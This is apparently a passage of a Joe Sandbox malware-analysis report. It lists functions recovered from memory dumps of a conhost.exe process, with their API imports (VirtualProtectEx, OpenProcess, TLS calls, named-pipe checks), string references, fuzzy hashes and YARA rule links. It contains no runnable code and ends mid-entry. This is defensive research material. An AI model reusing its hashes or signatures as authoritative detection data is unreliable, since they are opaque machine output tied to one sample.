Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction ID: 3dad8f73fe7ae5aa3f8930ed4e10bd4a57ed6c91f15ced3b66cfc03a67931d46
Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction Fuzzy Hash: 57519C3A714611CBE764CB26BD40AAAB3A0F789BD4F504129DE4A93B56DF3AC845CB04

Function 00000166BE492AB4 Relevance: 7.6, APIs: 6, Instructions: 127COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 00000166BE492AE1
TlsGetValue.KERNEL32 ref: 00000166BE492AF0
TlsGetValue.KERNEL32 ref: 00000166BE492AFF
TlsSetValue.KERNEL32 ref: 00000166BE492C3B
TlsSetValue.KERNEL32 ref: 00000166BE492C4A
TlsSetValue.KERNEL32 ref: 00000166BE492C59

Memory Dump Source

Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true

Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction ID: 68e5ce0a4b6170b8b0db872730a7d9d597251b13a1165e40e6fb2ae29e92476e
Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction Fuzzy Hash: CD51BB3A714601CBE724DF26BD40BAAB3A4F789BC0F504129EE4A93B55DF3AC805CB04

Function 00000166BE495E50 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00000166BE495E66

Memory Dump Source

Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true

Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
Instruction ID: de9993ca86bb3584239471d980e0057151692e0e5072efe5ff4096b5e3f69e2a
Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
Instruction Fuzzy Hash: BC61B73A629A44CBEB60CF55ED9435EB7A0F3887D4F100115EA8E97BA9DB7EC540CB00

Function 00000166BE493EC8 Relevance: 7.5, APIs: 5, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,00000166BE493A5B), ref: 00000166BE493EDB
GetCurrentProcess.KERNEL32(?,?,?,?,?,00000166BE493A5B), ref: 00000166BE493F0E
VirtualProtectEx.KERNEL32(?,?,?,?,?,00000166BE493A5B), ref: 00000166BE493F2E
GetCurrentProcess.KERNEL32(?,?,?,?,?,00000166BE493A5B), ref: 00000166BE493F47
VirtualProtectEx.KERNEL32(?,?,?,?,?,00000166BE493A5B), ref: 00000166BE493F68

Memory Dump Source

Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true

Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction ID: aa679931519f191bef8d5bffcd812e7300f2d489e5699fd636e3ef5278bf5635
Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction Fuzzy Hash: 8A114236709740D7EB249F21ED0429A67B0FB85BD1F040026DE5D93799EB7EC958C784

Function 00000166BE498CA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00000166BE498CCB
_IsNonwritableInCurrentImage.LIBCMT ref: 00000166BE498D62
RtlUnwindEx.NTDLL ref: 00000166BE498DBC

Strings

csm, xrefs: 00000166BE498D49

Memory Dump Source

Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true

Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction ID: 0777ffe8dd2f2bad62ce19ba1cf8a8400516cff88cbf09883b3117d3db10d415
Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction Fuzzy Hash: 4E51A13A311600CEEB54CF29EE54BAD7791F358BD8F158125DA4AD778ADB7AC841C700

Function 00000166BE49A6FC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00000166BE49A75B
_CallSETranslator.LIBVCRUNTIME ref: 00000166BE49A7A7

Strings

MOC, xrefs: 00000166BE49A76F
RCC, xrefs: 00000166BE49A777

Memory Dump Source

Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true

Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction ID: 9e6e676582616d8b4dc0cd5ead2e5c3730fd67bb3d167a7f88c7350ea3c90f58
Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction Fuzzy Hash: 77618E76604BC4C9DB218F15E9407DAB7A0F789BD8F044615EB9863B9ADB7DC198CB00

Function 00000166BE49AAAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00000166BE49AAD4
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00000166BE49ABBC

Strings

csm, xrefs: 00000166BE49AC0E
csm, xrefs: 00000166BE49AAF6

Memory Dump Source

Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true

Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction ID: 6aacb676702e2f4a08e5ca5213220d171fe28d530fb63d4b4a81c7c8b365879a
Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction Fuzzy Hash: 07515D3A300680CFEB748F269E4439977A1F354BD8F144116DB99ABBD6CB3AD458EB01

Function 00000166BBF79EAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00000166BBF79ED4
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00000166BBF79FBC

Strings

csm, xrefs: 00000166BBF7A00E
csm, xrefs: 00000166BBF79EF6

Memory Dump Source

Source File: 00000016.00000003.1886349302.00000166BBF70000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000166BBF70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_3_166bbf70000_conhost.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction ID: b72ebae929e233b0ccfb406de4a249b09307667aee3c71932a765234bc5a29df
Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction Fuzzy Hash: 9151AE3A300680CAEB748F6799443D877A8F3D4B94F1581A5DA99C7BD5CFBAC460CB41

Function 00000166BE493950 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

StrCmpNW.SHLWAPI ref: 00000166BE493972
StrStrW.SHLWAPI ref: 00000166BE493990
StrToIntW.SHLWAPI ref: 00000166BE4939B7

Part of subcall function 00000166BE491A30: OpenProcess.KERNEL32 ref: 00000166BE491A56
Part of subcall function 00000166BE491A30: K32GetModuleFileNameExW.KERNEL32 ref: 00000166BE491A74
Part of subcall function 00000166BE491A30: PathFindFileNameW.SHLWAPI ref: 00000166BE491A83
Part of subcall function 00000166BE491A30: lstrlenW.KERNEL32 ref: 00000166BE491A8F
Part of subcall function 00000166BE491A30: StrCpyW.SHLWAPI ref: 00000166BE491AA2
Part of subcall function 00000166BE491A30: CloseHandle.KERNEL32 ref: 00000166BE491AB0

Part of subcall function 00000166BE493F88: StrCmpNIW.SHLWAPI(?,?,?,00000166BE49272F), ref: 00000166BE493FA0

Strings

pid_, xrefs: 00000166BE493968

Memory Dump Source

Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true

Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID: pid_
API String ID: 517849248-4147670505
Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction ID: df5203a1a2c48d3e6539b3c5bd7a2118570d2d6bed1ae1af7d97246ff8d65bed
Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction Fuzzy Hash: BC117C39310B81D6EB109B25EE003DA62A4BB8A7C1F804035EA49E3B96EF7AC905C700

Function 00000166BE4A1FA8 Relevance: 6.3, APIs: 4, Instructions: 304fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00000166BE4A2027
WriteFile.KERNEL32 ref: 00000166BE4A2304
WriteFile.KERNEL32 ref: 00000166BE4A234A
GetLastError.KERNEL32 ref: 00000166BE4A2409

Memory Dump Source

Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true

Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction ID: 6d3580032cbf4e1325df24ad2b470a463ca845ec06f51c8f77204dee9577e004
Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction Fuzzy Hash: F0D1CD32714A94C9E711CFAAEC402DC37B2F355BE8F445226DE5EA7B99DA35C506C340

Function 00000166BE4914A0 Relevance: 6.3, APIs: 5, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000166BE4914C6
HeapFree.KERNEL32 ref: 00000166BE4914D5
GetProcessHeap.KERNEL32 ref: 00000166BE4914E2
HeapFree.KERNEL32 ref: 00000166BE4914F1
GetProcessHeap.KERNEL32 ref: 00000166BE491501

Memory Dump Source

Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true

Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction ID: f2eea10d51a52c92b53b38b1362babb25df4647851a90e3ad7ae00c032010ed3
Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction Fuzzy Hash: A8011332A50A90DAE714DF66AE042A977A2F788FD0B095025DB4993728DF39E491CB40

Function 00000166BE4A28F4 Relevance: 6.2, APIs: 4, Instructions: 229COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000166BE4A28DF), ref: 00000166BE4A2A12

Memory Dump Source

Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true

Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd

Similarity

API ID: ConsoleMode
String ID:
API String ID: 4145635619-0
Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction ID: b3cd6a23189f8c94c157d1149247f8b6a523cb09a0fe4b0d0bac6bd12b05ad48
Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction Fuzzy Hash: A8910132750651CAFB608F659C503ED3BA4F348BE8F446136DE0AA3B85DB36C485E308

Function 00000166BE498090 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00000166BE4980BC
GetCurrentThreadId.KERNEL32 ref: 00000166BE4980CA
GetCurrentProcessId.KERNEL32 ref: 00000166BE4980D6
QueryPerformanceCounter.KERNEL32 ref: 00000166BE4980E6

Memory Dump Source

Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true

Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction ID: abfea608fafa9835ee5f108dc4ef6ef1037b041ea70e306f0180a9217c567f39
Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction Fuzzy Hash: 47112736B50F04CAEB00CF64EC953EC33A4F7197A8F441E21EA6E867A4DB78C1548740

Function 00000166BE4927E8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00000166BE4928CC
StrCpyW.SHLWAPI ref: 00000166BE4928E5

Part of subcall function 00000166BE493F88: StrCmpNIW.SHLWAPI(?,?,?,00000166BE49272F), ref: 00000166BE493FA0

Strings

\\.\pipe\, xrefs: 00000166BE4928D7

Memory Dump Source

Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true

Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction ID: 5cabd43dcfbb229096699e4d06bf259754d875480af7926e571bec163fee44bd
Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction Fuzzy Hash: 5B71A33A300B81CAE774DF66AE543EA6794F385BC4F444026DD4AE7B9ADE36CA00C744

Function 00000166BBF780A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00000166BBF780CB
_IsNonwritableInCurrentImage.LIBCMT ref: 00000166BBF78162

Strings

csm, xrefs: 00000166BBF78149

Memory Dump Source

Source File: 00000016.00000003.1886349302.00000166BBF70000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000166BBF70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_3_166bbf70000_conhost.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm
API String ID: 3242871069-1018135373
Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction ID: b6a8e153242baea9c79be2d116e95aba4e6a0308998db6c8a6f82f034ceb8f1a
Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction Fuzzy Hash: FA51B23A311A00CAEB65CF17EC44BAC3799F384B99F158165DA4A87B88DFFAC841C700

Function 00000166BBF79AFC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

_CallSETranslator.LIBVCRUNTIME ref: 00000166BBF79BA7

Strings

MOC, xrefs: 00000166BBF79B6F
RCC, xrefs: 00000166BBF79B77

Memory Dump Source

Source File: 00000016.00000003.1886349302.00000166BBF70000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000166BBF70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_3_166bbf70000_conhost.jbxd

Similarity

API ID: CallTranslator
String ID: MOC$RCC
API String ID: 3163161869-2084237596
Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction ID: 7eac7314488a9bb72efe8657661dee72cdb7991daef02310ef8eaa13d7aa0bf7
Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction Fuzzy Hash: 9961AD36608BC4D5EB718F16E8407DAB7A4F7C5B98F048255EB9887B99CFB9C190CB00

Function 00000166BE4925DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00000166BE4926C2
StrCpyW.SHLWAPI ref: 00000166BE4926D9

Strings

\\.\pipe\, xrefs: 00000166BE4926CD

Memory Dump Source

Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true

Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction ID: 8828c7f4bf4e7af03dc153c73066f6a33c1333af54bbbdbdcddb961196a96e0a
Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction Fuzzy Hash: 8C51EF3A308781C9EA64DE2ABE543EA6791F7C5BD0F440065CE49B3B8BDA3BC804C744

Function 00000166BE4A2660 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00000166BE4A2778
GetLastError.KERNEL32 ref: 00000166BE4A279D

Strings

U, xrefs: 00000166BE4A2722

Memory Dump Source

Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true

Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction ID: 5ec8d02e71ede376c3dfc2ce02b05ed3984eeb6ce0a3fcbdc34f378d71ef00e6
Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction Fuzzy Hash: C541BE72725A80C6EB608F65EC447EAB7A4F3887E4F845132EA4DC7798EB39C541CB44

Function 00000166BE499178 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 00000166BE4991C8
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00000166BE4987F7), ref: 00000166BE499209

Strings

csm, xrefs: 00000166BE4991F6

Memory Dump Source

Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true

Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction ID: 27a4549cc9ede0cff28c0aa8fee22ba256c55b169a5d567dd640fec71190195b
Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction Fuzzy Hash: 58112836214B8086EB218B25FD44299B7E5F788B94F584220EF8D47B69DF3DC551CB00

Function 00000166BE491D30 Relevance: 5.0, APIs: 4, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000166BE491D69
HeapAlloc.KERNEL32 ref: 00000166BE491D77
GetProcessHeap.KERNEL32 ref: 00000166BE491D9C
